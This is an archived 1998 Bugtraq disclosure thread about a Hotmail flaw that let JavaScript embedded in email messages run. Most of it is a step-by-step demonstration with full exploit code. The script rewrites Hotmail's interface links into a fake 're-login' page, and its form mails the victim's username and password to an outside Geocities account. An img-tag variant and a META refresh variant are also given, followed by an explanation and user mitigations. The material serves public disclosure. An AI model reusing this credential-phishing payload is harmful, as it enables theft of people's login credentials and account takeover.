hotmail-javascript-8-98.txt

1999-08-17T00:00:00
ID PACKETSTORM:15171
Type packetstorm
Reporter Packet Storm
Modified 1999-08-17T00:00:00

Description

                                        
                                            `  
Date: Mon, 24 Aug 1998 14:21:56 -0600  
From: Tom Cervenka <tomc@SPECIALTY.AB.CA>  
Subject: Serious Security Hole in Hotmail  
  
We have just found a serious security hole in Microsoft's Hotmail  
service (http://www.hotmail.com) which allows malicious users to easily  
steal the passwords of Hotmail users. The exploit involves sending an  
e-mail message that contains embedded javascript code. When a Hotmail  
user views the message, the javascript code forces the user to re-login  
to Hotmail. In doing so, the victim's username and password is sent to  
the malicious user by e-mail. (see  
http://www.because-we-can.com/hotmail/default.htm for demo)  
  
Once a malicious user knows the password to the victim's Hotmail  
account, he can assume full control of the account, including the  
ability to:  
  
- delete, send, and read the victim's e-mail  
- check mail on other mail servers that the victim has  
configured for mail-checking  
- access the victim's address book  
- discover other passwords sent as confirmation of  
registration in old e-mails  
- change the password of the Hotmail account  
  
The security problem is dangerously easy to take advantage of. A  
would-be hacker needs only to embed the javascript code into the body of  
an e-mail message using a standard e-mail program such as Netscape Mail  
(free). In a working demonstration and full description of this exploit  
at http://www.because-we-can.com/hotmail/default.htm, it is shown that  
even users without their own internet service provider (ISP) can steal  
an arbitrary number of Hotmail passwords by using a free Geocities  
account.  
  
The "Hot"mail exploit is a serious security concern for the following  
reasons:  
  
1.The malicious code runs as soon as e-mail message is viewed  
2.The resources required to launch the attack are minnimal and  
freely available.  
3.The malicious e-mail can be sent from virtually anywhere,  
including libraries,  
internet cafes, or classroom terminals  
4.The exploit will work with any javascript-enabled browser,  
including the Microsoft  
Internet Explorer and Netscape Communicator.  
  
Both Microsoft and Hotmail have been notified that a security problem  
exists. The following information about the "Hot"Mail exploit is being  
made publicly available to speed the process of fixing the security hole  
and inform users how they can protect themselves. This information is  
also being released in the belief that when the public is aware of  
serious security problems, expedient measures are taken by software  
manufacturers to solve those problems.  
  
--------------------------------------------------------------------------  
  
Date: Tue, 25 Aug 1998 07:38:14 -0400  
From: Jeff Mcadams <jeffm@IGLOU.COM>  
Subject: Re: Serious Security Hole in Hotmail  
  
Thus spake Tom Cervenka  
  
>We have just found a serious security hole in Microsoft's Hotmail  
>service (http://www.hotmail.com) which allows malicious users to easily  
>steal the passwords of Hotmail users. The exploit involves sending an  
>e-mail message that contains embedded javascript code. When a Hotmail  
>user views the message, the javascript code forces the user to re-login  
>to Hotmail. In doing so, the victim's username and password is sent to  
>the malicious user by e-mail. (see  
>http://www.because-we-can.com/hotmail/default.htm for demo)  
  
This is a variation on the Spartan Horse announced by Dan Gregorie over  
a week ago, and covered on news.com on the 14th. The Spartan Horse is  
available for viewing at:  
http://www.thetopoftheworld.com  
The news.com articles, is at:  
http://www.news.com/News/Item/0,4,25274,00.html?st.ne.fd.gif.d  
  
The variation is that the Spartan Horse, as design on the  
www.thetopoftheworld.com site mimicks the Windows95/98  
Dial-Up-Networking dialog box.  
  
This wasn't originally sent to BUGTRAQ because it doesn't exploit a  
specific flaw in programming code in any software, like this "Hot"Mail  
exploit. Perhaps that was an oversight on Dan's and my fault, but I  
did want to set the record straight on the origination of this idea for  
Dan's sake.  
--  
Jeff McAdams Email: jeffm@iglou.com  
Head Network Administrator Voice: (502) 966-3848  
IgLou Internet Services (800) 436-4456  
  
--------------------------------------------------------------------------  
  
Date: Tue, 25 Aug 1998 16:31:47 -0400  
From: "Jonathan A. Zdziarski - Systems Administrator"  
<jonz@CARTMAN.NETRAIL.NET>  
Subject: Re: Serious Security Hole in Hotmail  
  
it appears that hotmail put a fix in this by s/<script>/<comment>/ or  
some variation, when you view a message.  
  
Thank you,  
  
Jonathan A. Zdziarski  
Senior Systems Administrator  
Netrail, Inc.  
888.NET.RAIL x242  
  
--------------------------------------------------------------------------  
  
Date: Tue, 25 Aug 1998 20:14:07 +0200  
From: Jonathan James <james@MBOX304.SWIPNET.SE>  
Subject: SV: Serious Security Hole in Hotmail  
  
Hello everybody.  
I studied Mr. Cervenka's e-mail and then started to experiment.  
There is a way to do this to a browser that has Javascripting disabled.  
Just put a META REFRESH tag into the htmlfile, the URL should point to the  
URL which contains the actual capturing and sending of the password/login.  
This is shown in an example below.  
<html>  
<meta http-equiv="refresh" content="1;  
url=the-url-that-is-to-be-pointed-to">  
and so on.....  
  
Thankyou for your time.  
  
Regards  
Jonathan James  
  
--------------------------------------------------------------------------  
  
"HOT"MAIL EXPLOIT TARGETING NETSCAPE 4.OX USERS  
  
This page demonstrates how we used the "Hot"Mail exploit with minimal  
resources to steal passwords from Hotmail users. Our goal was to show  
that using only the items listed below, we could steal a victim's  
Hotmail password and remain anonymous. The following version of the  
exploit has been patched by Hotmail as of Monday, August 25, 1998.  
Click here to see a variation of the "Hot"Mail exploit that works  
despite Hotmail's fix.  
  
INGREDIENTS:  
* 1 Computer with Internet Access  
* 1 Netscape Mail (or equivalent e-mail program)  
* 1 Notepad (or equivalent text editor)  
  
STEP 1:  
We visited hotmail.com and registered for a free e-mail account. We  
did not have to enter valid contact information during the  
registration process.  
  
STEP 2:  
We visited Geocities.com and registered for a free homepage. We chose  
the username ybwc. We did not have to enter valid contact information  
during the registration process, except for an e-mail address. We used  
the e-mail address from step 1. As part of our registration, we were  
given a new free email account from Geocities (ybwc@geocities.com).  
  
STEP 3:  
We opened our notepad and typed in the following text, which we then  
saved as message.htm. Line 17 contains our Geocities username (ybwc),  
from step 2.  
  
<html><head></head><body>  
<p>"Go where you want today" - Blue Adept</p>  
<script>  
function getmess(){  
return "<table border=0 cellpadding=5 cellspacing=5 width=508  
height=90%>" +  
"<tr valign=middle>" +  
"<th colspan=2>" +  
"<font face=\"Arial, Helvetica\" size=\"5\">" +  
"We're Sorry, We Cannot<br>Process Your Request" +  
"</font></th></tr>" +  
"<tr valign=middle><td align=center>" +  
"<font face=\"Arial, Helvetica\" size=\"3\">Reason: </font>" +  
"<font face=\"Arial, Helvetica\" size=\"3\"  
color=\"#ff0000\"><b>Time expired. Please re-login.</b></font><br>"  
+  
"<font face=\"Arial, Helvetica\" size=\"2\"><a  
href=\"http://www.hotmail.com/errormsg.html\">(Get more info  
regarding error messages here)</a></font>" +  
"</td></tr>" +  
"<tr valign=\"middle\"><td align=\"center\">" +  
"<FORM METHOD=POST  
ACTION=\"http://www.geocities.com/cgi-bin/homestead/mail.pl?ybwc\"  
target=\"_top\">" +  
"<INPUT TYPE=\"hidden\" NAME=\"next-url\"  
VALUE=\"http://www.hotmail.com\">" +  
"<INPUT TYPE=\"hidden\" NAME=\"subject\" VALUE=\"Hotmail  
Password\">" +  
"<table cellpadding=\"0\" cellspacing=\"5\" border=\"0\">" +  
"<tr><td><font face=\"Arial, Helvetica\" size=\"2\">Login  
Name:</font><br><input type=\"text\" name=\"login\" size=\"16\"  
maxlength=\"16\"></td><td><font face=\"Arial, Helvetica\"  
size=\"2\">Password:</font><br><input type=\"password\"  
name=\"passwd\" size=\"16\" maxlength=\"16\"> <input  
type=\"submit\" value=\"Enter\"></td><tr>" +  
"</table></form></td></tr>" +  
"<tr valign=middle><th colspan=2 align=center>" +  
"<font face=\"Arial, Helvetica\" size=\"3\">" +  
"Return to <a href=\"http://welcome.to/www.hotmail.com\"  
target=\"_parent\">Hotmail's Homepage</a>." +  
"</font></th></tr></table>" +  
"<p><img src=\"http://209.1.112.251/c9698.gif\" width=189 height=16  
border=0 alt=\"Copyright 1996-1997\">";  
}  
  
nomenulinks=top.submenu.document.links.length;  
for(i=0;i<nomenulinks-1;i++){  
top.submenu.document.links[i].target="work";  
top.submenu.document.links[i].href="javascript:getmess()";  
}  
  
noworklinks=top.work.document.links.length;  
for(i=0;i<noworklinks-1;i++){  
top.work.document.links[i].target="work";  
top.work.document.links[i].href="javascript:getmess()";  
}  
  
</script>  
</body>  
</html>  
  
STEP 4: We composed a new e-mail message to our (example) victim,  
victim@hotmail.com. We inserted the file message.htm into the e-mail  
message and then sent it.  
  
STEP 5: We waited for our victim to check his Hotmail account. Shortly  
after he viewed our message, we checked our Geocities email. We  
received an e-mail message from Geocities that listed the ip address,  
username, and password of the Hotmail user victim@hotmail.com  
  
--------------------------------------------------------------------------  
  
"HOT"MAIL EXPLOIT TARGETING ANY JAVASCRIPT- ENABLED BROWSER  
  
This page describes how users with moderate resources (web-space with  
an Internet Service Provider) can use "Hot"Mail against users of any  
javascript-enabled browser. We required no resources or special  
hardware beyond what is listed below: Hotmail has issued a patch to  
the problem, however we have discovered a problem with their fix. The  
following describes how we stole passwords from Netscape Navigator  
4.0x users after Hotmail posted a fix on the morning of Monday August  
25, 1998.  
  
INGREDIENTS:  
* 1 Computer with internet access  
* 1 Netscape Mail (or equivalent e-mail program)  
* 1 Notepad (or equivalent text editor)  
* web-page space  
  
STEP 1:  
We visited hotmail.com and registered for a free e-mail account. We  
did not have to enter valid contact information during the  
registration process.  
  
STEP 2:  
We visited Geocities.com and registered for a free homepage. We chose  
the username ybwc. We did not have to enter valid contact information  
during the registration process, except for an e-mail address. We used  
the e-mail address from step 1. As part of our registration, we were  
given a new free email account from Geocities (ybwc@geocities.com).  
  
STEP 3:  
We opened out notepad and typed in the following text, which we then  
saved as getmsg.htm. Then we uploaded the file onto our web-space.  
Line 14 contains our Geocities username (ybwc), from step 2.  
  
<html><head></head>  
<body bgcolor="#ffffff" link="#000099" vlink="#000099">  
<table border=0 cellpadding=5 cellspacing=5 width=508 height=90%>  
<tr valign=middle><th colspan=2>  
<font face="Arial, Helvetica" size="5">We're Sorry, We Cannot<br>  
Process Your Request</font>  
</th></tr>  
<tr valign=middle><td align=center>  
<font face="Arial, Helvetica" size="3">Reason: </font>  
<font face="Arial, Helvetica" size="3" color="#ff0000"><b>Time  
expired. Please re-login.</b></font><br>  
<font face="Arial, Helvetica" size="2"><a  
href="http://www.hotmail.com/errormsg.html">(Get more info  
regarding error messages here)</a></font>  
</td></tr>  
<tr valign="middle"><td align="center">  
<FORM METHOD=POST  
ACTION="http://www.geocities.com/cgi-bin/homestead/mail.pl?ybwc"  
target="_top">  
<INPUT TYPE="hidden" NAME="next-url"  
VALUE="http://www.hotmail.com">  
<INPUT TYPE="hidden" NAME="subject" VALUE="Hotmail Password">  
<table cellpadding="0" cellspacing="5" border="0">  
<tr><td><font face="Arial, Helvetica" size="2">Login  
Name:</font><br><input type="text" name="login" size="16"  
maxlength="16"></td><td><font face="Arial, Helvetica"  
size="2">Password:</font><br><input type="password" name="passwd"  
size="16" maxlength="16"> <input type="submit"  
value="Enter"></td><tr>  
</table></form></td></tr>  
<tr valign=middle><th colspan=2 align=center>  
<font face="Arial, Helvetica" size="3">Return to <a  
href="http://welcome.to/www.hotmail.com" target="_parent">Hotmail's  
Homepage</a>.  
</font></th></tr></table>  
<p><img src="http://209.1.112.251/c9698.gif" width=189 height=16  
border=0 alt="Copyright 1996-1997">  
</body></html>  
  
STEP 4:  
We opened our notepad and typed in the following text, which we then  
saved as message.htm. Line 4 contains the URL of the file getmsg.htm  
from step 3  
  
<html><head></head><body>  
<p>"Go where you want today" - Blue Adept</p>  
<img  
src="javascript:errurl='http://www.because-we-can.com/users/anon/ho  
tmail/getmsg.htm';  
nomenulinks=top.submenu.document.links.length;  
for(i=0;i<nomenulinks-1;i++){top.submenu.document.links[i].target='  
work';  
top.submenu.document.links[i].href=errurl;}noworklinks=top.work.doc  
ument.links.length;  
for(i=0;i<noworklinks-1;i++){top.work.document.links[i].target='wor  
k';  
top.work.document.links[i].href=errurl;}">  
</body>  
</html>  
  
STEP 4: We composed a new e-mail message to our victim,  
victim@hotmail.com*. We inserted the file message.htm into the e-mail  
message and then sent it.  
  
STEP 5: We waited for our victim to check his Hotmail account. Shortly  
after he viewed our message, we checked our Geocities email. It  
contained an e-mail message from Geocities that listed the ip address,  
username, and password of the Hotmail user victim@hotmail.com  
  
--------------------------------------------------------------------------  
  
HOW THE "HOT"MAIL EXPLOIT WORKS  
  
Why does the "Hot"Mail exploit work? The security problem lies in  
Microsoft's Hotmail service itself. Hotmail makes no attempt to filter  
Javascript code from email messages, allowing malicious users to embed  
arbitrary javascript programs into their e-mail messages. Javascript  
programs do not normally constitute a security problem when they are  
used in personal web-pages. However, when javascript code is embedded  
into a Hotmail message, it can alter the properties of the Hotmail  
user-interface itself.  
  
In the case of the exploits we describe, the javascript alters the  
properties of every link in the Hotmail interface that the user could  
click on. The links are altered so that when the user clicks on them,  
an (bogus) Hotmail message is displayed, informing the user that they  
have timed-out of their Hotmail session and must log-in again to  
continue. The (bogus) time-out page also gives the user some  
text-entry fields where they can type in their username and password  
to re-login. However, when the user types in their username and  
password, the information is sent back to the malicious user.  
  
In the exploits we describe, the part of the program that does the  
actual "dirty-work" of mailing the password and username is provided  
by Geocities as a (free) service to all their members. This should not  
be viewed as an oversight or problem with Geocities, since there are  
thousands of equivalent server-side mailing programs that we could  
have used in it's place.  
  
The "Hot"Mail exploit is just one of many potentially damaging  
javascript programs that could be embedded into mail messages. Since  
javascript code in email messages can run as soon as the message is  
viewed, and can alter virtually any aspect of the user interface, we  
urge Hotmail to implement a javascript filter.  
  
--------------------------------------------------------------------------  
  
HOW TO PROTECT YOURSELF FROM "HOT"MAIL  
  
Until Hotmail fixes the security problem, we suggest that Hotmail  
users turn off javascript in their browsers. Even users familiar with  
our version of the exploit may be vulnerable to other javascript  
programs embedded in Hotmail messages.  
  
Netscape users can turn javascript off in their preferences (edit /  
preferences / advanced / disable javascript).  
  
Microsoft Internet Explorer users can turn jscript off in their  
preferences (view / internet options / security / custom settings /  
scripting / disable active scripting).  
`